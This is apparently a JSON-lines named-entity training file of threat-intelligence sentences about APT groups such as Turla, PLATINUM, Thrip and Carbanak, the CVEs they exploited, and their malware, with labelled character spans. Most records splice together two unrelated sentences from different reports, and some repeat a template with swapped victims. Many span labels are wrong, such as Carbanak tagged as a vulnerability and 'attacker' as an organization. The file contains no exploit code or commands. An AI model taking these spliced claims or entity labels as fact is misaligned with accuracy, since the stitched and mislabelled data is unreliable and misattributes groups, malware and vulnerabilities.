{"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land .", "spans": [{"start": 29, "end": 36, "label": "Organization"}, {"start": 109, "end": 118, "label": "Malware"}, {"start": 133, "end": 146, "label": "Vulnerability"}, {"start": 151, "end": 164, "label": "Vulnerability"}, {"start": 183, "end": 189, "label": "Malware"}, {"start": 195, "end": 204, "label": "Organization"}]}
{"text": "Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability . TAA not only flagged this malicious use of PsExec , it also told us what the attackers were using it for .", "spans": [{"start": 24, "end": 33, "label": "Organization"}, {"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 196, "end": 209, "label": "Vulnerability"}, {"start": 226, "end": 229, "label": "Organization"}, {"start": 269, "end": 275, "label": "Malware"}]}
{"text": "PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 36, "end": 60, "label": "Vulnerability"}, {"start": 187, "end": 208, "label": "Malware"}]}
{"text": "They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . three computers in China being used to launch the Thrip attacks .", "spans": [{"start": 31, "end": 55, "label": "Vulnerability"}]}
{"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . Perhaps the most worrying discovery we made was that Thrip had targeted a satellite communications operator .", "spans": [{"start": 40, "end": 57, "label": "Organization"}, {"start": 86, "end": 116, "label": "Malware"}, {"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 251, "end": 284, "label": "Organization"}]}
{"text": "PittyTiger could also use CVE-2014-1761 , which is more recent . Thrip seemed to be mainly interested in the operational side of the company .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 26, "end": 39, "label": "Vulnerability"}]}
{"text": "PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts . This suggests to us that Thrip 's motives go beyond spying and may also include disruption .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 43, "end": 60, "label": "Vulnerability"}]}
{"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . Armed with this information about the malware and living off the land tactics being used by this group of attackers whom we named Thrip , we broadened our search to see if we could find similar patterns that indicated Thrip had been targeting other organizations .", "spans": [{"start": 46, "end": 61, "label": "System"}, {"start": 76, "end": 91, "label": "Malware"}, {"start": 203, "end": 216, "label": "Vulnerability"}]}
{"text": "When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . The group had also targeted three different telecoms operators , all based in Southeast Asia .", "spans": [{"start": 32, "end": 36, "label": "System"}, {"start": 39, "end": 47, "label": "Organization"}, {"start": 153, "end": 166, "label": "Vulnerability"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 326, "end": 344, "label": "Organization"}]}
{"text": "The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application . In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 72, "end": 85, "label": "Vulnerability"}, {"start": 159, "end": 163, "label": "System"}, {"start": 330, "end": 348, "label": "Organization"}, {"start": 374, "end": 383, "label": "Organization"}]}
{"text": "When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection .", "spans": [{"start": 32, "end": 36, "label": "System"}, {"start": 147, "end": 160, "label": "Vulnerability"}, {"start": 194, "end": 202, "label": "Organization"}, {"start": 276, "end": 285, "label": "Indicator"}, {"start": 298, "end": 304, "label": "Malware"}]}
{"text": "In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . Many of the tools they use now feature new behaviors , including a change in the ACT they maintain a foothold in the targeted network .", "spans": [{"start": 11, "end": 19, "label": "Organization"}, {"start": 37, "end": 54, "label": "Vulnerability"}, {"start": 289, "end": 306, "label": "Vulnerability"}, {"start": 358, "end": 375, "label": "Vulnerability"}]}
{"text": "PLATINUM has used several zero-day exploits against their victims . Execute a command through exploits for CVE-2017-11882 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 26, "end": 43, "label": "Vulnerability"}, {"start": 107, "end": 121, "label": "Vulnerability"}]}
{"text": "Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers . Execute a command through exploits for CVE-2018-0802 .", "spans": [{"start": 8, "end": 21, "label": "Vulnerability"}, {"start": 168, "end": 177, "label": "Organization"}, {"start": 219, "end": 232, "label": "Vulnerability"}]}
{"text": "For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 . The backdoor will load the encrypted configuration file and decrypt it , then use Secure Sockets Layer ( SSL ) protocol to connect to command-and-control ( C&C ) servers .", "spans": [{"start": 18, "end": 40, "label": "Vulnerability"}, {"start": 51, "end": 64, "label": "Vulnerability"}, {"start": 75, "end": 83, "label": "Organization"}, {"start": 212, "end": 232, "label": "Indicator"}, {"start": 235, "end": 238, "label": "Indicator"}, {"start": 264, "end": 283, "label": "System"}, {"start": 286, "end": 289, "label": "System"}]}
{"text": "It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks . TClient is actually one of Tropic Trooper 's other backdoors .", "spans": [{"start": 29, "end": 64, "label": "System"}, {"start": 131, "end": 148, "label": "Vulnerability"}, {"start": 325, "end": 332, "label": "Malware"}]}
{"text": "In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched . The malicious loader will use dynamic-link library ( DLL ) hijacking \u2014 injecting malicious code into a process of a file/application \u2014 on sidebar.exe and launch dllhost.exe ( a normal file ) .", "spans": [{"start": 37, "end": 42, "label": "Organization"}, {"start": 101, "end": 114, "label": "Vulnerability"}, {"start": 238, "end": 258, "label": "System"}, {"start": 261, "end": 264, "label": "System"}, {"start": 346, "end": 357, "label": "Indicator"}, {"start": 369, "end": 380, "label": "Indicator"}]}
{"text": "To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion . TClient , for instance , uses DLL hijacking and injection that may not be as noticeable to others .", "spans": [{"start": 52, "end": 88, "label": "Vulnerability"}, {"start": 151, "end": 158, "label": "Malware"}]}
{"text": "However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 . The backdoor noted by other security researchers was encoded with different algorithms and configured with different parameter names in 2016 , for instance .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 105, "end": 121, "label": "Vulnerability"}, {"start": 126, "end": 142, "label": "Vulnerability"}]}
{"text": "The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites . Taiwan has been a regular target of Cyber Espionage threat actors for a number of years .", "spans": [{"start": 86, "end": 98, "label": "Vulnerability"}]}
{"text": "In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group\u2019s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild . In early August , Unit 42 identified two attacks using similar techniques .", "spans": [{"start": 22, "end": 39, "label": "Organization"}, {"start": 72, "end": 80, "label": "Organization"}, {"start": 132, "end": 147, "label": "Vulnerability"}, {"start": 180, "end": 187, "label": "Organization"}]}
{"text": "The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations . which has been active since at least 2011 .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 62, "end": 77, "label": "Vulnerability"}]}
{"text": "FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 . One of the attacks used Tropic Trooper 's known Yahoyah malware , but the other attack deployed the widely available Poison Ivy RAT .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 79, "end": 93, "label": "Vulnerability"}, {"start": 215, "end": 222, "label": "Malware"}, {"start": 223, "end": 230, "label": "Malware"}]}
{"text": "If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host . This confirms the actors are using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them .", "spans": [{"start": 71, "end": 90, "label": "System"}, {"start": 218, "end": 229, "label": "Vulnerability"}, {"start": 304, "end": 314, "label": "Malware"}, {"start": 379, "end": 390, "label": "Organization"}]}
{"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1) , and executing it using ShellExecute() . The document attached to this e-mail exploits CVE-2012-0158 .", "spans": [{"start": 110, "end": 124, "label": "Vulnerability"}, {"start": 138, "end": 148, "label": "System"}, {"start": 288, "end": 294, "label": "Vulnerability"}, {"start": 295, "end": 303, "label": "Vulnerability"}, {"start": 304, "end": 317, "label": "Vulnerability"}]}
{"text": "We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate .", "spans": [{"start": 54, "end": 62, "label": "Vulnerability"}, {"start": 110, "end": 121, "label": "Organization"}, {"start": 190, "end": 201, "label": "Indicator"}]}
{"text": "Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 . Further analysis uncovered a handful of ties indicating the actors may also be using the PCShare malware family , which has not been previously tied to the group .", "spans": [{"start": 10, "end": 16, "label": "Organization"}, {"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 154, "end": 176, "label": "Malware"}]}
{"text": "This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild . This matches with known Tactics , Techniques , and Procedures ( TTPs ) for Tropic Trooper , targeting both government institutions and also the energy industry in Taiwan .", "spans": [{"start": 5, "end": 18, "label": "Vulnerability"}, {"start": 37, "end": 44, "label": "Organization"}, {"start": 213, "end": 227, "label": "Organization"}, {"start": 245, "end": 268, "label": "Organization"}, {"start": 282, "end": 297, "label": "Organization"}]}
{"text": "Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors .", "spans": [{"start": 37, "end": 51, "label": "Vulnerability"}, {"start": 86, "end": 92, "label": "Organization"}, {"start": 146, "end": 162, "label": "Vulnerability"}, {"start": 185, "end": 199, "label": "Organization"}, {"start": 225, "end": 238, "label": "Vulnerability"}]}
{"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . The Tropic Trooper threat actor group has been known to target governments and organizations in the Asia Pacific region for at least six years .", "spans": [{"start": 99, "end": 108, "label": "Malware"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 189, "end": 197, "label": "Malware"}, {"start": 198, "end": 210, "label": "Malware"}, {"start": 295, "end": 301, "label": "Malware"}, {"start": 322, "end": 332, "label": "Malware"}, {"start": 339, "end": 372, "label": "Organization"}, {"start": 398, "end": 409, "label": "Organization"}]}
{"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . Turla is a notorious group that has been targeting governments .", "spans": [{"start": 63, "end": 76, "label": "System"}, {"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 194, "end": 203, "label": "Malware"}, {"start": 215, "end": 220, "label": "Organization"}, {"start": 266, "end": 277, "label": "Organization"}]}
{"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . Turla is known to run watering hole and spearphishing campaigns to better pinpoint their targets .", "spans": [{"start": 15, "end": 21, "label": "Organization"}, {"start": 109, "end": 122, "label": "Vulnerability"}, {"start": 162, "end": 170, "label": "Malware"}, {"start": 173, "end": 178, "label": "Organization"}]}
{"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . Turla is a notorious group that has been targeting government officials .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 121, "end": 145, "label": "System"}, {"start": 148, "end": 153, "label": "Organization"}, {"start": 199, "end": 219, "label": "Organization"}]}
{"text": "According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors .", "spans": [{"start": 13, "end": 20, "label": "Organization"}, {"start": 27, "end": 36, "label": "Organization"}, {"start": 104, "end": 136, "label": "Vulnerability"}, {"start": 187, "end": 194, "label": "System"}, {"start": 201, "end": 210, "label": "Indicator"}, {"start": 294, "end": 307, "label": "Vulnerability"}, {"start": 363, "end": 377, "label": "System"}, {"start": 378, "end": 393, "label": "Vulnerability"}]}
{"text": "According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . Turla is a notorious group that has been targeting diplomats .", "spans": [{"start": 13, "end": 20, "label": "Organization"}, {"start": 27, "end": 36, "label": "Organization"}, {"start": 104, "end": 136, "label": "Vulnerability"}, {"start": 187, "end": 194, "label": "System"}, {"start": 197, "end": 202, "label": "Organization"}, {"start": 248, "end": 257, "label": "Organization"}]}
{"text": "Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . The codename for Turla APT group in this presentation is MAKERSMARK .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 65, "end": 73, "label": "System"}, {"start": 82, "end": 96, "label": "System"}, {"start": 99, "end": 103, "label": "System"}, {"start": 129, "end": 142, "label": "Vulnerability"}, {"start": 162, "end": 177, "label": "Organization"}]}
{"text": "The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The Intercept reported that there exists a 2011 presentation by Canada 's Communication Security Establishment ( CSE ) outlining the errors made by the Turla operators during their operations even though the tools they use are quite advanced .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 60, "end": 74, "label": "Vulnerability"}, {"start": 92, "end": 99, "label": "System"}, {"start": 106, "end": 126, "label": "System"}, {"start": 223, "end": 269, "label": "Organization"}, {"start": 272, "end": 275, "label": "Organization"}, {"start": 311, "end": 316, "label": "Organization"}]}
{"text": "APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The witnessed techniques , tactics and procedures ( TTPs ) are in-line with what we usuallysee in Turla 's operation : a first stage backdoor , such as Skipper , likely delivered through spearphishing followed by the appearance on the compromised system of a second stage backdoor , Gazerin this case .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 49, "end": 63, "label": "Vulnerability"}, {"start": 81, "end": 88, "label": "System"}, {"start": 95, "end": 115, "label": "System"}, {"start": 246, "end": 264, "label": "Organization"}, {"start": 300, "end": 307, "label": "Malware"}]}
{"text": "The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . Southeastern Europe as well as countries in the former Soviet Union Republichas recently been the main target .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 53, "end": 67, "label": "Vulnerability"}, {"start": 85, "end": 92, "label": "System"}, {"start": 99, "end": 119, "label": "System"}]}
{"text": "APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . Finally , there are many similarities between Gazer and other second stage backdoors used by the Turla group such as Carbon and Kazuar .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 46, "end": 65, "label": "Vulnerability"}, {"start": 74, "end": 90, "label": "System"}, {"start": 91, "end": 100, "label": "System"}, {"start": 214, "end": 219, "label": "Malware"}, {"start": 243, "end": 252, "label": "Malware"}, {"start": 265, "end": 270, "label": "Organization"}, {"start": 285, "end": 291, "label": "Organization"}, {"start": 296, "end": 302, "label": "Organization"}]}
{"text": "The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 . Skipper , which has been linked to Turla in the past , was found alongside Gazer in most cases we investigated .", "spans": [{"start": 4, "end": 12, "label": "System"}, {"start": 110, "end": 123, "label": "Vulnerability"}, {"start": 126, "end": 139, "label": "Vulnerability"}, {"start": 157, "end": 164, "label": "Malware"}, {"start": 192, "end": 197, "label": "Organization"}, {"start": 232, "end": 237, "label": "Malware"}]}
{"text": "We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit . Turla APT group makes an extra effort to avoid detection by wiping files securely , changing the strings and randomizing what could be simple markers through the different backdoor versions .", "spans": [{"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 88, "end": 96, "label": "System"}, {"start": 150, "end": 158, "label": "Vulnerability"}, {"start": 180, "end": 185, "label": "Organization"}, {"start": 209, "end": 224, "label": "Organization"}]}
{"text": "FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including government institutions .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 54, "end": 59, "label": "Organization"}, {"start": 72, "end": 106, "label": "Vulnerability"}, {"start": 109, "end": 122, "label": "Vulnerability"}, {"start": 139, "end": 154, "label": "System"}, {"start": 202, "end": 212, "label": "Malware"}, {"start": 291, "end": 314, "label": "Organization"}]}
{"text": "FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . Turla all uses an encrypted container to store the malware 's components and configuration and they also log their actions in a file .", "spans": [{"start": 0, "end": 27, "label": "Organization"}, {"start": 74, "end": 79, "label": "Organization"}, {"start": 92, "end": 126, "label": "Vulnerability"}, {"start": 129, "end": 142, "label": "Vulnerability"}, {"start": 159, "end": 174, "label": "System"}, {"start": 201, "end": 206, "label": "Organization"}, {"start": 219, "end": 238, "label": "Malware"}]}
{"text": "A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . Over the last 10 months , Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call \" Epic Turla \" .", "spans": [{"start": 30, "end": 35, "label": "Organization"}, {"start": 54, "end": 61, "label": "Organization"}, {"start": 105, "end": 121, "label": "Vulnerability"}, {"start": 247, "end": 258, "label": "Organization"}, {"start": 287, "end": 300, "label": "Organization"}, {"start": 379, "end": 389, "label": "Malware"}]}
{"text": "A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . We also observed exploits against older ( patched ) vulnerabilities , social engineering techniques and watering hole strategies in these attacks .", "spans": [{"start": 30, "end": 46, "label": "Organization"}, {"start": 65, "end": 72, "label": "Organization"}, {"start": 116, "end": 132, "label": "Vulnerability"}, {"start": 258, "end": 269, "label": "Organization"}, {"start": 342, "end": 360, "label": "Organization"}]}
{"text": "Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 20, "end": 36, "label": "Organization"}, {"start": 54, "end": 95, "label": "Vulnerability"}, {"start": 98, "end": 111, "label": "Vulnerability"}, {"start": 158, "end": 164, "label": "System"}, {"start": 246, "end": 256, "label": "Malware"}, {"start": 335, "end": 344, "label": "Organization"}]}
{"text": "Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including military .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 20, "end": 25, "label": "Organization"}, {"start": 43, "end": 84, "label": "Vulnerability"}, {"start": 87, "end": 100, "label": "Vulnerability"}, {"start": 147, "end": 153, "label": "System"}, {"start": 235, "end": 245, "label": "Malware"}, {"start": 324, "end": 332, "label": "Organization"}]}
{"text": "BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including education .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 69, "end": 91, "label": "Vulnerability"}, {"start": 272, "end": 282, "label": "Malware"}, {"start": 361, "end": 370, "label": "Organization"}]}
{"text": "The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . When G-Data published on Turla/Uroburos back in February , several questions remained unanswered .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 65, "end": 87, "label": "Vulnerability"}, {"start": 252, "end": 258, "label": "Organization"}, {"start": 272, "end": 286, "label": "Organization"}]}
{"text": "BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including research and pharmaceutical companies .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 96, "end": 110, "label": "System"}, {"start": 136, "end": 150, "label": "Vulnerability"}, {"start": 190, "end": 200, "label": "Malware"}, {"start": 292, "end": 316, "label": "Organization"}]}
{"text": "The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . The primary backdoor used in the Epic attacks is also known as \" WorldCupSec \" , \" TadjMakhal \" , \" Wipbot \" or \" Tavdig \" .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 92, "end": 106, "label": "System"}, {"start": 132, "end": 146, "label": "Vulnerability"}, {"start": 230, "end": 241, "label": "Organization"}, {"start": 248, "end": 258, "label": "Organization"}, {"start": 265, "end": 271, "label": "Organization"}, {"start": 279, "end": 285, "label": "Organization"}]}
{"text": "While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . Thrip 's motive is likely espionage and its targets include those in the communications , geospatial imaging , and defense sectors , both in the United States and Southeast Asia .", "spans": [{"start": 39, "end": 50, "label": "Organization"}, {"start": 62, "end": 75, "label": "Organization"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 315, "end": 329, "label": "Organization"}, {"start": 332, "end": 350, "label": "Organization"}, {"start": 357, "end": 372, "label": "Organization"}]}
{"text": "While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . One big unknown was the infection vector for Turla ( aka Snake or Uroburos ) .", "spans": [{"start": 39, "end": 50, "label": "Organization"}, {"start": 82, "end": 95, "label": "Organization"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 307, "end": 312, "label": "Organization"}, {"start": 319, "end": 324, "label": "Organization"}, {"start": 328, "end": 336, "label": "Organization"}]}
{"text": "Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . The mothership server is generally a VPS , which runs the Control panel software used to interact with the victims .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 51, "end": 58, "label": "System"}, {"start": 76, "end": 85, "label": "Organization"}, {"start": 195, "end": 198, "label": "System"}]}
{"text": "If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated .", "spans": [{"start": 32, "end": 40, "label": "Vulnerability"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 301, "end": 314, "label": "Vulnerability"}, {"start": 315, "end": 318, "label": "System"}, {"start": 319, "end": 326, "label": "Vulnerability"}]}
{"text": "To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Once a victim is confirmed as \" interesting \" , the attackers upload another Epic backdoor which has a unique ID used to control this specific victim .", "spans": [{"start": 57, "end": 80, "label": "System"}, {"start": 83, "end": 86, "label": "System"}, {"start": 91, "end": 99, "label": "Vulnerability"}, {"start": 227, "end": 240, "label": "Malware"}]}
{"text": "Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system . Our analysis indicates this is a sophisticated multi-stage infection ; which begins with Epic Turla .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 234, "end": 244, "label": "Malware"}]}
{"text": "Sensitive bank documents have be found on the servers that were controlling Carbanak . this attack against a Kaspersky Lab user on August 5 , 2014 .", "spans": [{"start": 76, "end": 84, "label": "Vulnerability"}, {"start": 109, "end": 122, "label": "Organization"}]}
{"text": "Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa . VENOMOUS BEAR is an advanced , Russia-based adversary that's been active since at least 2004 .", "spans": [{"start": 38, "end": 46, "label": "Vulnerability"}, {"start": 47, "end": 56, "label": "Organization"}, {"start": 172, "end": 185, "label": "Organization"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Venomous Bear has deployed malware to targets using several novel methods .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 199, "end": 212, "label": "Organization"}]}
{"text": "This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . For years , Turla has relied , among other impersonations , on fake Flash installers to compromise victims .", "spans": [{"start": 72, "end": 80, "label": "Vulnerability"}, {"start": 97, "end": 115, "label": "Organization"}, {"start": 126, "end": 143, "label": "Organization"}, {"start": 146, "end": 161, "label": "Organization"}, {"start": 166, "end": 178, "label": "Organization"}, {"start": 193, "end": 198, "label": "Organization"}, {"start": 244, "end": 265, "label": "Malware"}]}
{"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . Turla merely uses the Adobe brand to trick users into downloading the malware .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 176, "end": 183, "label": "System"}, {"start": 186, "end": 191, "label": "Organization"}]}
{"text": "From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get.adobe.com URLs since at least July 2016 .", "spans": [{"start": 10, "end": 18, "label": "Vulnerability"}, {"start": 55, "end": 60, "label": "Organization"}, {"start": 65, "end": 83, "label": "Organization"}, {"start": 125, "end": 130, "label": "Organization"}, {"start": 186, "end": 191, "label": "Organization"}]}
{"text": "Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . Thus , it is clear they are trying to be as stealthy as possible by hiding in the network traffic of the targeted organizations .", "spans": [{"start": 11, "end": 19, "label": "Vulnerability"}, {"start": 79, "end": 84, "label": "Organization"}, {"start": 91, "end": 106, "label": "Organization"}]}
